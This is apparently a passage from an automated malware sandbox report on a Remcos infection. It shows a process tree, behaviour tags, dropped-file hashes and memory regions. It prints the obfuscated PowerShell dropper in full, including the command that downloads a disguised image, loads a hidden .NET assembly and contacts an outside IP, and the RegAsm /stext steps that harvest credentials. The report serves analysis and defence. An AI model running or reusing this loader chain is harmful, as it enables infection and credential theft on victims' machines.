⭋ ⌼Gc⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bo⽃ ⇯ ⿉ ⭋ ⌼Ck⽃ ⇯ ⿉ ⭋ ⌼Ow⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GM⽃ ⇯ ⿉ ⭋ ⌼bwBt⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼QgB5⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼ZQBz⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼PQ⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Fs⽃ ⇯ ⿉ ⭋ ⌼UwB5⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼LgBD⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼bgB2⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼cgB0⽃ ⇯ ⿉ ⭋ ⌼F0⽃ ⇯ ⿉ ⭋ ⌼Og⽃ ⇯ ⿉ ⭋ ⌼6⽃ ⇯ ⿉ ⭋ ⌼EY⽃ ⇯ ⿉ ⭋ ⌼cgBv⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼QgBh⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼ZQ⽃ ⇯ ⿉ ⭋ ⌼2⽃ ⇯ ⿉ ⭋ ⌼DQ⽃ ⇯ ⿉ ⭋ ⌼UwB0⽃ ⇯ ⿉ ⭋ ⌼HI⽃ ⇯ ⿉ ⭋ ⌼aQBu⽃ ⇯ ⿉ ⭋ ⌼Gc⽃ ⇯ ⿉ ⭋ ⌼K⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼YQBz⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼Ng⽃ ⇯ ⿉ ⭋ ⌼0⽃ ⇯ ⿉ ⭋ ⌼EM⽃ ⇯ ⿉ ⭋ ⌼bwBt⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼KQ⽃ ⇯ ⿉ ⭋ ⌼7⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼Bv⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼QQBz⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼ZQBt⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼B5⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼PQ⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Fs⽃ ⇯ ⿉ ⭋ ⌼UwB5⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼LgBS⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼ZgBs⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼YwB0⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼bwBu⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼QQBz⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼ZQBt⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼B5⽃ ⇯ ⿉ ⭋ ⌼F0⽃ ⇯ ⿉ ⭋ ⌼Og⽃ ⇯ ⿉ ⭋ ⌼6⽃ ⇯ ⿉ ⭋ ⌼Ew⽃ ⇯ ⿉ ⭋ ⌼bwBh⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼K⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GM⽃ ⇯ ⿉ ⭋ ⌼bwBt⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼QgB5⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼ZQBz⽃ ⇯ ⿉ ⭋ ⌼Ck⽃ ⇯ ⿉ ⭋ ⌼Ow⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼eQBw⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bs⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼YQBk⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼BB⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼cwBl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YgBs⽃ ⇯ ⿉ ⭋ ⌼Hk⽃ ⇯ ⿉ ⭋ ⌼LgBH⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼BU⽃ ⇯ ⿉ ⭋ ⌼Hk⽃ ⇯ ⿉ ⭋ ⌼c⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Cg⽃ ⇯ ⿉ ⭋ ⌼JwBk⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼LgBJ⽃ ⇯ ⿉ ⭋ ⌼E8⽃ ⇯ ⿉ ⭋ ⌼LgBI⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼bQBl⽃ ⇯ ⿉ ⭋ ⌼Cc⽃ ⇯ ⿉ ⭋ ⌼KQ⽃ ⇯ ⿉ ⭋ ⌼7⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼bQBl⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼a⽃ ⇯ ⿉ ⭋ ⌼Bv⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼B0⽃ ⇯ ⿉ ⭋ ⌼Hk⽃ ⇯ ⿉ ⭋ ⌼c⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼RwBl⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼TQBl⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼a⽃ ⇯ ⿉ ⭋ ⌼Bv⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼K⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼FY⽃ ⇯ ⿉ ⭋ ⌼QQBJ⽃ ⇯ ⿉ ⭋ ⌼Cc⽃ ⇯ ⿉ ⭋ ⌼KQ⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼Ek⽃ ⇯ ⿉ ⭋ ⌼bgB2⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼awBl⽃ ⇯ ⿉ ⭋ ⌼Cg⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bu⽃ ⇯ ⿉ ⭋ ⌼HU⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼Bs⽃ ⇯ ⿉ ⭋ ⌼Cw⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼Bb⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼YgBq⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼YwB0⽃ ⇯ ⿉ ⭋ ⌼Fs⽃ ⇯ ⿉ ⭋ ⌼XQBd⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼K⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼B0⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼TwBI⽃ ⇯ ⿉ ⭋ ⌼FQ⽃ ⇯ ⿉ ⭋ ⌼VQBB⽃ ⇯ ⿉ ⭋ ⌼C8⽃ ⇯ ⿉ ⭋ ⌼NQ⽃ ⇯ ⿉ ⭋ ⌼1⽃ ⇯ ⿉ ⭋ ⌼DE⽃ ⇯ ⿉ ⭋ ⌼Lw⽃ ⇯ ⿉ ⭋ ⌼y⽃ ⇯ ⿉ ⭋ ⌼Dc⽃ ⇯ ⿉ ⭋ ⌼MQ⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼Dc⽃ ⇯ ⿉ ⭋ ⌼Mw⽃ ⇯ ⿉ ⭋ ⌼y⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼O⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼y⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼OQ⽃ ⇯ ⿉ ⭋ ⌼0⽃ ⇯ ⿉ ⭋ ⌼DE⽃ ⇯ ⿉ ⭋ ⌼Lw⽃ ⇯ ⿉ ⭋ ⌼v⽃ ⇯ ⿉ ⭋ ⌼Do⽃ ⇯ ⿉ ⭋ ⌼c⽃ ⇯ ⿉ ⭋ ⌼B0⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼a⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼L⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Cc⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼YQB0⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼dgBh⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼bw⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼L⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Cc⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼YQB0⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼dgBh⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼bw⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼L⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Cc⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼YQB0⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼dgBh⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼bw⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Cw⽃ ⇯ ⿉ ⭋ ⌼JwBS⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼ZwBB⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼bQ⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Cw⽃ ⇯ ⿉ ⭋ ⌼Jw⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Ck⽃ ⇯ ⿉ ⭋ ⌼KQ⽃ ⇯ ⿉ ⭋ ⌼=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⽃ ⇯ ⿉ ⭋ ⌼','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OHTUA/551/271.732.82.941//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3616
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4872
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jvupftykyhxtmfqtvr"
            5⤵
              PID:1408
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jvupftykyhxtmfqtvr"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2460
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mpzagmidmppgwlmxebfxv"
              5⤵
              • Accesses Microsoft Outlook accounts
              • System Location Discovery: System Language Discovery
              PID:5092
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\wrftyetfzxhlzrabvmszgcmiy"
              5⤵
                PID:1500
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\wrftyetfzxhlzrabvmszgcmiy"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2060

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\remcos\logs.dat
        Filesize

        144B

        MD5

        cb5a6d0a435dc0e0647912718c02101a

        SHA1

        7fbf7e0c7f48fcf8092c395e4e3d984435e5a89c

        SHA256

        80d1d8804c0c5d4db9c10d16cb055d4428092290cfba1929c6678e470d04e34c

        SHA512

        a9ca7b8e932da570a302abd15942069a4221e7f9a21548c57343dd0cabbace5c87a7160d6c6e5a774bb9894696e4f0940f2612c0fca4b48eb59a20f0b37c7dd9

        Download Submit

      • C:\ProgramData\remcos\logs.dat
        Filesize

        230B

        MD5

        e9492d310033309667795a6e1f224b85

        SHA1

        435b1ff833cbfb7cc39b3034fdc9fe1989390944

        SHA256

        41f8f5916f0a4494e483c0b6167fa5d68f2f259041eaa0241efa4d0f7f639657

        SHA512

        6245365b0bf72e0631e0da61021cb226e8dacd36c25892a3bca3fb056252c197add7f1c976e38d871744f589c1ad793f874120c88e43cbcd695ff1c4019fd4dc

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        f41839a3fe2888c8b3050197bc9a0a05

        SHA1

        0798941aaf7a53a11ea9ed589752890aee069729

        SHA256

        224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

        SHA512

        2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        5caad758326454b5788ec35315c4c304

        SHA1

        3aef8dba8042662a7fcf97e51047dc636b4d4724

        SHA256

        83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

        SHA512

        4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wgb1embh.3an.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\jvupftykyhxtmfqtvr
        Filesize

        4KB

        MD5

        8b8277c8f03c24d1f290dbe476e961d2

        SHA1

        2e13baf3a4b708277d550dc3dd1e0f99b131f78e

        SHA256

        9af6881f6dbffba028a7a977f4c0a43c764f840332986993ad66de7b816c2f9e

        SHA512

        7367a0236cd0d6cd731caf1ba1f4ea8f851ea1018a9c6b49db6e9d13b2aaba92767774da9169481918e4287021ff5c3a58c3143eaa5e7fe9fa88383208615948

        Download Submit

      • memory/2060-47-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2060-54-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2060-55-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2460-50-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/2460-48-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/2460-45-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/2460-53-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/3616-23-0x000001E94BD30000-0x000001E94BE52000-memory.dmp

        Filesize

        1.1MB

        Download

      • memory/3680-0-0x00007FF9A94A3000-0x00007FF9A94A5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3680-33-0x00007FF9A94A0000-0x00007FF9A9F61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3680-13-0x00007FF9A94A0000-0x00007FF9A9F61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3680-12-0x00007FF9A94A0000-0x00007FF9A9F61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3680-11-0x00007FF9A94A0000-0x00007FF9A9F61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3680-1-0x0000024DF1FD0000-0x0000024DF1FF2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4872-70-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-64-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

        Download

      • memory/4872-103-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-42-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-102-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-41-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-39-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-40-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-95-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-38-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-37-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-34-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-61-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

        Download

      • memory/4872-44-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-65-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

        Download

      • memory/4872-66-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-32-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-69-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-30-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-77-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-78-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-85-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-86-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-24-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4872-94-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/5092-51-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/5092-52-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/5092-46-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download